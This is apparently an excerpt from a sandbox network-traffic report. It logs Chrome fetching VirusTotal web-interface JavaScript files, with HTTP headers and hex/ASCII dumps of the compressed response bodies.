                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 01 b9 db 94 09 a6 6c d8 bf 33 22 0b 63 f7 61 02 9a d8 2e fa 4d 29 e2 9f d8 9a 22 c2 e2 90 57 c4 6f fc 7f a1 cf f3 08 d7 e4 6e c4 80 3f 6f 28 05 04 b5 49 ba 56 e5 5d d3 93 3d 24 7b 3d 46 68 d5 76 f5 20 a5 75 23 8b a9 1e c6 d6 b5 82 ef c3 dd 6d 75 7c 7f 42 31 2d b4 90 66 e8 26 f9 bb 8b 1e ba a5 a6 88 b2 87 03 41 97 71 4b 29 3f 1e 66 47 03 e1 61 3a d5 cd 6c 4a 2d b4 16 71 78 d0 b4 55 b5 92 77 f5 2d db da 88 50 ea cd 8a e7 81 3f 38 fa 62 87 7d 88 69 9c 9d e2 9e fe 50 b5 b5 fb 9c f0 a0 a9 92 40 67 17 a3 95 0a e0 d5 bd 9a a0 67 e7 22 52 f1 28 6a d4 54 6f 08 72 72 94 0d b1 be f1 58 c5 d2 a8 9d cd 98 4d 1c 34 8f 51 ec 72 d8 80 af eb 2c aa 52 ab ab f3 28 6a 43 ff b5 f1 11 e0 65 d6 a2 93 d8 a6 b6 93 ea 75 6d 03 3b 3e 61 65 81 c4 97 a8 eb 15 65 7d ac 0d b6 3a 1a 0c
                                                                                                                                                                                                                    Data Ascii: l3"ca.M)"Won?o(IV]=${=Fhv u#mu|B1-f&AqK)?fGa:lJ-qxUw-P?8b}iP@gg"R(jTorrXM4Qr,R(jCeum;>aee}:
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1350INData Raw: 20 87 34 ac 6a 9c ba 66 60 1a 3f be 10 75 fa 0f 56 b3 ee 77 3f 63 d4 6d 60 90 b2 ed 26 e7 72 34 eb 79 1f a9 65 6a 62 7b c2 8e cf 4a d3 e9 58 6f 4d af fb f1 d2 2d da 5c 62 c7 7c f8 e4 c2 c2 da 44 6f 1e 45 9f 2d 2d 6b 23 74 cf a3 33 e8 a4 51 73 90 b7 5a 5a 07 19 35 1a cd 13 03 99 16 28 1d 1d 8f 43 42 ea b5 b8 86 5a 1d ba a6 92 32 88 9a bb c3 e6 5b b7 c3 a3 b6 55 13 94 9b 8a 6e 03 7e c4 00 7d 04 50 33 dc a6 cc d6 47 7a 9d e8 3d c4 a3 4c 83 22 7f 4c 6e 17 d3 89 2f 41 39 c1 73 cb b4 b0 c3 31 a7 3f 0c 7a 3d 24 1a 89 f0 6f cb e8 34 e0 a7 93 7e db d5 22 7e 7a e9 12 ef d1 e2 61 da 6c 19 e9 9b 46 59 98 f0 13 a2 78 0e c8 ba 72 84 4b ec 66 d8 0c af 3e d1 33 08 bf 6d 58 3d ce d3 8d a6 a7 1b 4d d6 55 01 64 cd df 05 4f 37 9a e8 76 9c a5 cd 11 fe 7c ba d1 24 2f 4f 3d dd
                                                                                                                                                                                                                    Data Ascii: 4jf`?uVw?cm`&r4yejb{JXoM-\b|DoE--k#t3QsZZ5(CBZ2[Un~}P3Gz=L"Ln/A9s1?z=$o4~"~zalFYxrKf>3mX=MUdO7v|$/O=
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    118192.168.2.164986974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC689OUTGET /gui/65524.4523ddf7cb1bdb5a39f0.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1d946132b0904babfc2b515f37ed58b6
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:46:04 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:46:04 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36563
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 66 66 37 0d 0a ff ac 5c 69 73 db 46 9a fe be bf 02 e1 64 14 22 05 40 b8 0f ca b4 27 a3 4c 76 5c a5 24 53 76 92 ad 8a d7 e5 80 64 53 44 04 12 2c 00 d4 11 9a ff 7d 9f b7 0f a0 41 52 4e b2 15 2b 11 89 3e df fb ea 86 c6 0d 2b 97 ce 03 9b 6d f3 f9 dd f5 6a b7 b9 bb 6f 3f ec 8a 0f eb bc d8 4c 3f d1 f7 f1 e3 bb f7 a6 b3 dd 35 ab f1 bb 77 71 14 f9 e1 7b 6b cf 3f 27 e3 d6 62 56 6d 4e 5f ee 47 bb 86 19 4d 5b 17
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000ff7\isFd"@'Lv\$SvdSD,}ARN+>+mjo?L?5wq{k?'bVmN_GM[
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 3c 0c 78 c0 09 cd 60 3c 46 8a 19 50 88 f6 15 27 1c 01 d9 2d cb cc 09 6f 3c d1 61 31 f6 94 7d 62 f8 29 61 cc 03 78 b7 00 a0 82 c1 dc 59 29 ab 44 94 ff 6c 3a 1d b7 27 94 bf b8 10 3a 8a 5e d8 d5 96 2b aa b0 5d ca 86 7f fc a8 66 43 22 c9 f6 f4 74 83 71 ec 66 03 57 e6 14 cd 0d f8 06 3b f4 8a 9b 94 55 bb 2e cd f1 d3 c7 8f e3 a7 e9 87 5f 5e 2c 8a 7b 83 5b bc e9 e8 c1 f6 5c d7 28 8b a6 b5 6f eb 6a b7 1d 09 93 34 1d b5 d5 76 62 c0 2a 8f 6d bb df c7 e6 03 1b 58 af bb 27 1b 23 cc 2b e3 37 1b 0c 67 8f 13 c3 1b bd 84 94 ba 07 e3 c5 25 d6 7f f9 8b 54 08 41 8b d7 9b a6 b8 5d b5 cd 1b 08 8f 69 4e 34 a0 96 00 6a 49 40 dd b7 f6 ae b0 9b 2d 9b 17 79 69 93 8d 64 8d d1 16 6d c9 ec 66 9d 97 a5 e1 14 eb fc 96 bd c9 1f a6 d0 03 f7 80 ed 5e 34 db 7c 63 34 65 d5 02 5e 1a 39 7a f9
                                                                                                                                                                                                                    Data Ascii: <x`<FP'-o<a1}b)axY)Dl:':^+]fC"tqfW;U._^,{[\(oj4vb*mX'#+7g%TA]iN4jI@-yidmf^4|c4e^9z
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 0a 29 aa 10 b0 79 af 9c 8d 62 8f 26 69 9a 06 89 f8 52 a7 75 fd aa 9e b8 a6 ed bd 1a 59 e0 db 08 49 2b 59 f5 4e 68 94 15 ee 9d dd b1 21 ee b2 7a 72 60 03 8b eb 74 88 0c 8d ef c7 8f cc 11 e9 b9 34 df 24 90 08 33 ae e1 6d a8 f8 34 56 c5 30 8d f7 df 82 ee df 72 ba 7f 22 58 1b 86 4b 03 bd e4 01 0f d1 7b 74 5e b3 61 d4 1b b6 2e 66 88 97 cf 87 4c 7d 7a 26 02 a5 2e 5a 41 f4 23 f9 48 e9 e3 20 04 fa 23 0e e1 b9 b9 94 48 36 d2 47 f2 44 25 7c c6 a3 e8 0b f0 ef 90 25 15 27 0c 0a 18 c7 f1 8e 8c 65 64 dd 48 c8 9f 32 58 67 5d 80 d2 1f dd fc 3b 3c 7f d5 c3 22 32 ee 14 13 29 21 6d ba 5a 5f 67 96 35 d9 ac d4 a2 c7 c6 b9 ba 65 1b 46 75 d8 c5 07 19 78 eb 52 db bc 6a 54 49 18 d5 d5 53 93 78 de b8 2e 64 91 18 7e c9 9a 9d 8b 88 be 87 94 7d 0f 29 7b 26 57 54 a5 82 89 ce 71 ae ba
                                                                                                                                                                                                                    Data Ascii: )yb&iRuYI+YNh!zr`t4$3m4V0r"XK{t^a.fL}z&.ZA#H #H6GD%|%'edH2Xg];<"2)!mZ_g5eFuxRjTISx.d~}){&WTq
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC346INData Raw: 70 ec 82 43 3d cb e8 57 11 5b f2 a5 d7 d5 a6 42 85 61 0e f9 54 2b 5f 57 0b 26 57 ee 7a c5 8c db 1a c7 9a 08 08 26 38 b3 e4 41 a6 6a 18 e3 cc 64 c1 6e 2d 03 96 29 1f 2b cc 24 8e ae e3 e1 fa cf f9 2e b8 7b e1 25 a9 c4 c8 01 5a e6 eb a2 84 31 15 a7 9f 70 a0 47 14 38 99 d0 e0 5c 65 e2 d5 6c 7d bc d2 03 8f 59 27 06 54 5f eb 22 c8 6d 11 ce c2 86 3a ca bf d1 fe 48 45 2a 32 b9 88 14 e0 82 b5 39 bc 43 30 27 80 49 25 03 18 86 5a ff 8c ac 77 e7 09 79 8a 00 f5 e0 56 7a 40 0b 31 45 99 94 6e bf ce 34 0d 7b ce 48 43 6f 35 14 ac 41 1c cc 43 65 42 3b b5 d2 00 8e 42 cb 88 21 4f 89 f4 84 fd 12 02 ea 6c 99 2f 67 02 30 bd 4b 42 1f c2 19 f8 88 af f1 4b 86 24 2a f7 e9 a0 8f fd 78 9e 4a 6a 0c 3b c5 1a 59 0a 7f e2 d2 2f e5 34 ba 51 1c 02 04 f6 6c 79 3c bf 23 1f d1 da 0f 30 db 57
                                                                                                                                                                                                                    Data Ascii: pC=W[BaT+_W&Wz&8Ajdn-)+$.{%Z1pG8\el}Y'T_"m:HE*29C0'I%ZwyVz@1En4{HCo5ACeB;B!Ol/g0KBK$*xJj;Y/4Qly<#0W
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 92 0d 0a 30 30 30 30 30 30 30 31 0d 0a b0 0d 0a 30 30 30 30 66 65 65 0d 0a a8 74 b7 69 62 34 55 89 fb 32 7a 87 da 85 45 2c 53 f6 58 2e 25 a4 06 31 f6 a6 29 77 94 6e 4d 84 d2 92 35 12 ff 39 5e 12 75 0a c8 f7 21 8b b0 83 c7 77 9d 20 89 34 25 d4 3a 71 83 80 fa fd e7 ba 4b 68 8f eb 3c d7 fb 88 e8 54 d7 6e 7d e1 47 ea f4 9f d9 d5 a7 ce ce 8a 48 14 05 b8 36 26 9e 43 c3 a6 2c 7f 62 44 ae b6 e4 a3 dd ac 72 5c bb 01 8c 12 4a 0e ce 29 65 7a c2 a8 29 02 71 cc f2 38 ee 8a 06 27 53 5d 8d a8 dd 5c 4e 15 b1 55 00 70 4e 26 e9 9c e8 26 15 c8 60 c0 35 fe 01 78 bd ed a3 e1 e3 7f 6e 95 35 2e f6 1b 2e 2b 64 7a 76 4d fa 24 05 69 c0 28 ad bb 82 93 c0 35 02 c1 49 21 51 5a af 94 2a be 91 26 fb 90 1a f0 5d 92 1a 37 0d d7 f6 3d ee 53 e0 28 4e 5a 5a 3d
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000feetib4U2zE,SX.%1)wnM59^u!w 4%:qKh<Tn}GH6&C,bDr\J)ez)q8'S]\NUpN&&`5xn5..+dzvM$i(5I!QZ*&]7=S(NZZ=
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 2b ee 6d 2d 02 7d 70 41 53 37 8d d2 9a aa 0b 4c 34 29 1c 48 27 10 91 56 e3 08 75 25 85 0a 0d ed 86 fe 9e 6e 07 2e 71 c0 05 2f c3 4d 9e 0a 2e ba 76 91 84 51 cc d8 56 bb f9 ea e0 f0 e3 7c 01 2b ff 8a 70 9f c7 94 e4 a7 5c 27 46 0a 26 ec cc b0 93 e7 bb c1 51 67 1f 6f bb 0e e5 6e fa 44 de a7 2a 8f dd 69 9c 58 54 08 67 cf e1 2e b0 10 f5 19 ba 6f a0 0a e2 32 50 d0 c7 6a 85 0f b3 f3 a0 c5 86 87 fa 38 86 9c df 29 2f a3 05 28 7c 49 85 e8 93 a9 2d 37 e8 79 34 45 5e c1 4b a9 1d 17 04 d0 1d b2 72 8c c4 ed dc 28 d1 85 97 29 b5 ec c3 c3 ed 28 aa aa 1e 8d e7 8d 32 65 15 b9 18 d9 69 56 5f 89 2a b9 a8 48 6f 2a 1e 11 1c d9 8e 19 5e a1 a3 1d 94 01 39 89 a9 4e e9 08 09 e2 c8 4c 60 9f db a7 2e 52 e4 91 ee 3f ee d8 d3 12 2f 69 e1 7d 17 1c ea e3 84 b4 c1 99 2d a2 6d 61 e4 9b bd
                                                                                                                                                                                                                    Data Ascii: +m-}pAS7L4)H'Vu%n.q/M.vQV|+p\'F&QgonD*iXTg.o2Pj8)/(|I-7y4E^Kr()(2eiV_*Ho*^9NL`.R?/i}-ma
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1299INData Raw: 65 22 fe e1 67 46 10 3a 00 38 bb 06 52 51 9c e0 1b 81 aa 46 e1 1b 9f 87 4f e0 8f 6e 35 ca 97 f3 fc 6b b5 12 5a b0 ba 1c 25 f6 fb 34 0e bd 3e cd 70 85 8b ee e4 e2 4a d0 27 90 c8 32 ce 08 9d 37 03 9e f5 6c 4c 40 fe 28 05 af d2 d4 71 31 2d cc 9c 38 00 b7 3c 27 4d 43 a0 f0 6f df fb c9 8b 32 27 4b c2 eb 20 c3 3d 09 bc e5 ee a5 98 84 ab da 71 e2 04 7e 80 e7 8e f5 7f 2d 16 61 22 c8 0d 98 88 0f 20 77 d4 91 9b be 11 b9 e9 53 10 52 8d f2 0d 31 cf bf 0e 31 80 d8 84 16 c8 97 1c 85 6f 34 8f 5a 04 7b d5 28 e0 2e f6 fb 6b 91 d0 04 3e 84 2d 49 7d ff 3a 82 4a 84 5e 66 c4 9e 93 a4 a0 9f 6b 40 39 92 88 57 18 af a1 af 5e 8a e0 c3 50 a3 3c 48 8d ef 41 ee 3b cd f9 34 80 dd f5 4e 75 af 15 02 b3 08 16 c9 72 f9 09 81 01 11 5c b0 79 a0 77 01 e8 13 25 80 23 4d dd 08 8a 0e b0 32 00
                                                                                                                                                                                                                    Data Ascii: e"gF:8RQFOn5kZ%4>pJ'27lL@(q1-8<'MCo2'K =q~-a" wSR11o4Z{(.k>-I}:J^fk@9W^P<HA;4Nur\yw%#M2
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    119192.168.2.164987074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC689OUTGET /gui/55164.0738a891fce6393c9b5c.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 9283d779a3ae1f688b6dcad66afc4e58
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:39:42 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:39:42 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36945
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a eb 0d 0a 30 30 30 30 30 31 0d 0a 73 0d 0a 30 66 66 32 0d 0a db 46 92 ff 7e 7f 05 42 ef 3a 44 0e 80 f0 7e 50 a6 9c ac 92 2b bb ca d9 6c c5 ce 5d 55 bc 2e 2f 48 0c 45 c4 24 c0 03 40 3d 56 e6 ff 7e bf ee 99 01 41 52 8a 73 5e 7f 5c 33 91 38 af 9e 7e 4f 4f 37 a0 71 2b 56
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001\00000001000001s0ff2F~B:D~P+l]U./HE$@=V~ARs^\38~OO7q+V
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 54 01 03 3f 30 b9 65 b7 5e 99 e3 fc e3 c7 71 3e 2d fe f1 ac 28 af 8d b2 98 8e 48 dd 46 06 7b 8e e9 68 53 b7 25 31 da 6e 04 2c ac bc 16 46 07 6f 62 cf 1a 91 7f 30 6e 6c cf 75 8d b5 ed 1a b5 62 bb bd 2c 8b 42 54 a3 0b e3 59 bb aa 3b e3 5b fa 39 5f e6 d5 95 98 8e fe 74 ef ee 46 17 cf ce a8 0f 13 ce b0 e1 85 41 9d ff 50 46 f0 90 d0 95 7f d9 8b f5 39 bb 0b 89 fb 0a b8 af 80 bb c1 c8 2b 94 97 f0 34 f3 0f c6 6f db b6 2b 17 77 36 ac 05 de af b3 e7 f8 21 1a c2 2c 37 e0 c5 80 cf 6c db 75 75 35 32 be 85 9a ce 3f 28 fc 34 e1 ab b2 fa 60 6f 1a e8 59 73 37 ba 78 bd ac 6f 18 d5 67 67 79 8f ba 46 fb 50 7f 14 c2 50 99 e7 23 78 b9 76 34 19 ad eb 46 8c cc c9 00 f1 19 10 9f 01 f1 7f 98 d0 bf dd f9 66 fc 16 83 95 b3 51 a7 95 09 41 e3 44 9a fc a5 06 a2 79 65 35 f2 5c 9a 7c e5
                                                                                                                                                                                                                    Data Ascii: T?0e^q>-(HF{hS%1n,Fob0nlub,BTY;[9_tFAPF9+4o+w6!,7luu52?(4`oYs7xoggyFPP#xv4FfQADye5\|
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: b2 ed ee 1f cf e1 be 45 ea f8 68 b6 23 d3 bc 14 50 1c dc 5a 2e 71 6b 79 b7 83 8f 3d 49 3f ab 20 56 3b bc c7 6e 48 32 7a ca 37 e5 cf 9c 93 02 a0 65 b9 e9 2f 37 ed 48 8e 57 f5 4b 18 5a 4b f1 c0 74 10 59 7d 40 98 f1 61 fa 27 5c 8a a4 b2 b5 1b 31 2f f3 95 cd ea db 1a 5d d9 21 0f c0 37 10 c3 41 f2 e7 4a fc 9c df e8 58 82 54 59 8d a9 78 7f 6d c3 1a 6b 0a 50 38 4e a3 cc d6 74 c4 30 46 17 7f ad 0d e5 70 5a 94 02 90 11 d4 11 ac 0e 3b 0e b7 be 40 28 96 8f 71 8a c9 2b 0f ce 29 b4 d4 41 dd 07 06 48 d6 51 4d 66 9d 6f 38 51 3d a0 eb 25 e8 7a 39 a0 4b 6d 6d 38 fa 00 d2 44 38 64 f4 7d 43 ba e4 83 26 b9 d8 be 43 81 21 87 d7 f7 f5 c7 49 df d3 4b 4c de fa c0 39 e9 e3 fa 09 a7 3e ab 1f 1a 9e 2c 7d 67 ef a9 75 cf b7 07 ae 41 c5 05 6a 10 37 cb 83 51 0e df 45 4f 38 22 29 22 19
                                                                                                                                                                                                                    Data Ascii: Eh#PZ.qky=I? V;nH2z7e/7HWKZKtY}@a'\1/]!7AJXTYxmkP8Nt0FpZ;@(q+)AHQMfo8Q=%z9Kmm8D8d}C&C!IKL9>,}guAj7QEO8")"
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC402INData Raw: d2 e3 5a df 98 f7 c3 13 70 d3 08 0e 9f 76 d2 3d bf d5 d6 81 88 ec dd a4 aa bb f1 5b 7a 88 e1 9d 69 1a 8c da 24 5f 20 ee a0 db 09 3d b7 81 42 d6 b9 0c 8e 38 04 3d c0 58 3f 9c 32 c9 67 30 6c 84 f4 78 ea 0d 67 a9 7b ae 2c 03 5f f6 9c 20 82 f3 c6 46 2e bb a0 87 94 c6 7c f2 a1 e0 8f ef 3a b2 78 98 d6 3d 0c dc c8 34 09 8c b0 c4 f7 5e d3 33 29 ab a5 68 ca 6e c8 49 d5 b5 fb 7a af 55 ab 9d c5 b9 ac 2f a0 55 5a 8d 0e 02 fa af cf be f9 0a 16 f5 8d 81 1b 4f 87 1c 4b be 81 4b 8f 9c c0 f1 8d f1 b2 eb 36 ed e4 ec 0c 17 cb 99 1e a5 bb de 99 c9 2b 2e eb cd 1d 47 98 38 f9 3c cf f6 5d 3f 30 de 2c c5 00 d2 77 5c f3 6c 79 f6 2b a4 d0 2b dc dc 0c 28 1a e2 b9 1f 5f be 19 6c 50 76 cb ed 8c 41 77 37 b3 f6 ac df ed 0c 41 c9 ec 8c 1e 3d 3d 7b f5 f2 f2 87 bf be fe 81 b7 3e 9b 34 c0
                                                                                                                                                                                                                    Data Ascii: Zpv=[zi$_ =B8=X?2g0lxg{,_ F.|:x=4^3)hnIzU/UZOKK6+.G8<]?0,w\ly++(_lPvAw7A=={>4
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a f8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 37 0d 0a 30 30 30 30 30 30 30 31 0d 0a e8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 87 0d 0a 30 30 30 30 30 30 30 31 0d 0a 01 0d 0a 30 30 30 30 30 30 30 31 0d 0a d0 0d 0a 30 30 30 30 30 30 30 31 0d 0a f2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 83 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 76 0d 0a 30 30 30 30 30 30 30 31 0d 0a fb 0d 0a 30 30 30 30 30 30 30 31 0d 0a 0b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 06 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 31 0d 0a a0 0d 0a 64 39 64 0d 0a 0b b3 45 4c 9f 41
                                                                                                                                                                                                                    Data Ascii: 0000000100000001700000001000000010000000100000001000000010000000100000001>0000000100000001n00000001_00000001v000000010000000100000001|000000010000000100001d9dELA
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC1408INData Raw: 6d a9 41 94 43 6f ee 75 59 8b 12 1e 03 17 c6 34 62 3a de f8 fc 50 a2 0e 8b e2 37 a7 bf 20 97 ce 5e 94 62 55 b4 3a df 6d 3d 36 8d 90 7b 74 10 79 46 24 5b 1e 1d 5e 22 dc 92 fb 3c 3a a5 c8 ef 3e 31 03 71 54 b7 fc c4 9c 3b 4a e8 30 41 7b 56 10 9f 14 e1 cc 24 54 61 90 50 96 85 8a 7b 95 3d 42 75 be 1e cc 6b 01 66 be 44 bd 9a 5f ec 44 36 fc 5e 43 a0 a7 e4 f1 4a 08 34 15 92 86 e2 ec 61 4b 85 69 6f e8 49 46 cd cc 07 91 a0 47 2c ed ed 66 55 e7 85 c6 82 c2 b3 3e 57 f4 c0 56 12 59 6c c6 6b f1 24 36 72 f4 75 f3 ff 5d 3d c8 a7 d0 cb 5a 5c ce b3 6f e9 dc 51 87 db be 97 4e 9b 28 a1 4a a3 3c 0f f7 23 6b 64 4e 92 98 f2 cb c7 23 e4 6c b3 8c 32 d2 c7 23 7c fc 20 29 f1 d0 10 8f 21 ba dc c0 4f 7c 10 77 0b 7a 7d af 35 f0 3a 13 f2 2c 2d 32 3f 90 27 32 56 e5 46 b4 f7 ee 9f ef f7
                                                                                                                                                                                                                    Data Ascii: mACouY4b:P7 ^bU:m=6{tyF$[^"<:>1qT;J0A{V$TaP{=BukfD_D6^CJ4aKioIFG,fU>WVYlk$6ru]=Z\oQN(J<#kdN#l2#| )!O|wz}5:,-2?'2VF
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC920INData Raw: 31 1b 0a a2 db ca 4c 75 5b 0b 0b f3 dc 90 14 8a 45 09 e4 a4 99 52 eb 8b 38 17 72 15 f0 99 be 0f 97 40 86 97 00 65 78 64 98 06 35 a3 08 2a ce a8 c2 95 a2 1d 78 31 24 00 0b 4a a1 47 e0 30 5c a5 7f 09 a5 f5 13 b2 70 38 08 fc 61 1e 12 34 0b 00 ea 43 ea 04 46 06 31 96 c1 32 92 c0 0f 2f d1 46 05 10 e0 d0 8e 69 3a 3c b5 0b 83 44 3b f3 53 16 14 4a 6c 6c 59 5e 9a a6 97 18 0f 7d 12 70 0a c3 83 ee a3 1d e1 c1 3d 6a 33 78 0c 67 2e 96 43 fb bc d8 e3 e9 f0 33 d4 8e 7d 17 bf 61 c7 89 9f e0 01 2a 30 5e aa 59 e0 45 3e b5 61 a8 d1 2b 1a 77 e5 78 12 7a bc 3e c3 3b f9 34 1e f8 e4 6d c8 2a c8 b0 33 58 01 e4 0d 2a 91 6f 67 f8 7e 4c f3 41 06 39 2d c8 09 69 1e 9a e6 fb b4 7d ec 84 30 65 06 13 30 d2 69 08 3f 40 50 23 e2 2d bc 8d 07 a2 a8 9d 44 60 46 e8 24 19 6c 8d da 59 c8 f3 93
                                                                                                                                                                                                                    Data Ascii: 1Lu[ER8r@exd5*x1$JG0\p8a4CF12/Fi:<D;SJllY^}p=j3xg.C3}a*0^YE>a+wxz>;4m*3X*og~LA9-i}0e0i?@P#-D`F$lY
                                                                                                                                                                                                                    2024-04-25 19:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    120192.168.2.164987174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
